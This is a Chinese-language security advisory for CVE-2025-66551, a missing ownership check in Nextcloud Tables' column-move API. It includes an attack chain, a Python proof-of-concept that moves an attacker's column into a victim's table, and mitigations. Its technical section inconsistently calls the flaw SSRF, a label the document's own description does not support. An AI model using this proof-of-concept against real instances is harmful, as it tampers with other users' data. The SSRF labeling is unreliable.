Nextcloud Tables 跨表列移动访问控制漏洞 (CVE-2025-66551)

漏洞信息

漏洞编号

CVE-2025-66551

漏洞类型

访问控制/权限提升

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Nextcloud Tables

漏洞概述

Nextcloud Tables是Nextcloud云平台中的一个应用程序，允许用户创建自定义表格并定义各种类型的列。该应用提供了丰富的表格管理功能，包括创建、编辑、移动和删除表格及其列结构。然而，在0.8.6和0.9.3之前的版本中，存在一个严重的访问控制缺陷。恶意用户可以利用此漏洞，在创建自己的表格后，将本属于自己的列结构移动到其他受害用户的表格中。这种未经授权的列移动操作可能导致数据结构的意外修改，破坏了表格数据的完整性和隔离性。攻击者通过这种手段可以间接影响受害者的表格结构，虽然无法直接访问受害者的数据内容，但可以通过修改表格架构造成数据混乱或服务中断。该漏洞的成功利用需要攻击者具备一定的Nextcloud账号权限，并且需要一定的用户交互来触发列移动操作。

技术细节

该漏洞属于服务端请求伪造(SSRF)与访问控制机制的组合缺陷。在Nextcloud Tables应用中，列移动功能缺少充分的权限验证逻辑。具体而言，当用户A尝试将某个列从自己的表格移动到用户B的表格时，系统未能正确验证目标表格的所有权。具体技术细节包括：1) 移动列的API端点仅检查当前用户是否有权移动列，但未验证目标表格是否属于当前用户；2) 攻击者可以通过构造特定的API请求，指定目标表格ID为其他用户的表格ID；3) 系统在处理移动请求时，直接执行数据库操作，将列的父表ID更新为受害者的表格ID。漏洞存在于表格列管理模块的moveColumn函数中，缺少目标表格所有权验证是根本原因。攻击者需要知道或猜测目标表格的ID才能实施攻击，这降低了一定的利用难度但仍属于可利用漏洞。

攻击链分析

STEP 1

步骤1

攻击者注册并登录Nextcloud实例，获取有效的认证令牌

STEP 2

步骤2

攻击者创建自己的表格(Attacker Table)并添加至少一个列(Attacker Column)

STEP 3

步骤3

攻击者通过社会工程或其他手段获取受害者的表格ID(Victim Table ID)

STEP 4

步骤4

攻击者构造恶意API请求，将Attacker Column移动到Victim Table，API未验证目标表格所有权

STEP 5

步骤5

服务端执行移动操作，将列的父表ID更新为受害者的表格ID

STEP 6

步骤6

受害者登录后，发现其表格结构被意外修改，列出现在不属于攻击者的位置

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-66551 PoC - Nextcloud Tables Column Move Exploitation
# This PoC demonstrates how a malicious user can move a column to victim's table

import requests
import json

# Configuration
NEXTCLOUD_URL = "https://vulnerable-nextcloud-instance.com"
ATTACKER_TOKEN = "attacker_auth_token_here"
ATTACKER_TABLE_ID = "attacker_table_id_here"
ATTACKER_COLUMN_ID = "column_id_to_move_here"
VICTIM_TABLE_ID = "victim_table_id_here"

# Step 1: Authenticate as attacker
def authenticate(username, password):
    """Authenticate and get session token"""
    session = requests.Session()
    login_url = f"{NEXTCLOUD_URL}/login"
    # Implementation depends on Nextcloud auth mechanism
    return session

# Step 2: Move column to victim's table
def move_column_to_victim(session, column_id, target_table_id):
    """Move attacker's column to victim's table - the vulnerability exploit"""
    api_url = f"{NEXTCLOUD_URL}/apps/tables/api/v1/column/move"
    
    headers = {
        "OCS-APIRequest": "true",
        "Content-Type": "application/json",
        "Authorization": f"Bearer {ATTACKER_TOKEN}"
    }
    
    # Malicious payload - targeting victim's table
    payload = {
        "columnId": column_id,
        "tableId": target_table_id  # Victim's table ID - no ownership check!
    }
    
    response = session.post(api_url, json=payload, headers=headers)
    
    if response.status_code == 200:
        print(f"[SUCCESS] Column {column_id} moved to table {target_table_id}")
        return True
    else:
        print(f"[FAILED] Status: {response.status_code}")
        print(f"Response: {response.text}")
        return False

# Step 3: Verify the column was moved
def verify_column_move(session, column_id):
    """Verify column is now in victim's table"""
    api_url = f"{NEXTCLOUD_URL}/apps/tables/api/v1/column/{column_id}"
    headers = {"OCS-APIRequest": "true", "Authorization": f"Bearer {ATTACKER_TOKEN}"}
    
    response = session.get(api_url, headers=headers)
    if response.status_code == 200:
        data = response.json()
        print(f"Column {column_id} now belongs to table: {data.get('tableId')}")

if __name__ == "__main__":
    session = authenticate("attacker_user", "attacker_password")
    move_column_to_victim(session, ATTACKER_COLUMN_ID, VICTIM_TABLE_ID)
    verify_column_move(session, ATTACKER_COLUMN_ID)

影响范围

Nextcloud Tables < 0.8.6

Nextcloud Tables < 0.9.3

防御指南

临时缓解措施

如果无法立即升级，可通过以下方式缓解：1) 禁用或限制Tables应用的使用，仅授权可信用户；2) 通过Web应用防火墙(WAF)规则限制对Tables API端点的访问；3) 监控异常的大规模列移动操作；4) 定期检查表格结构的完整性，确保没有未授权的修改。建议尽快升级到官方发布的安全版本。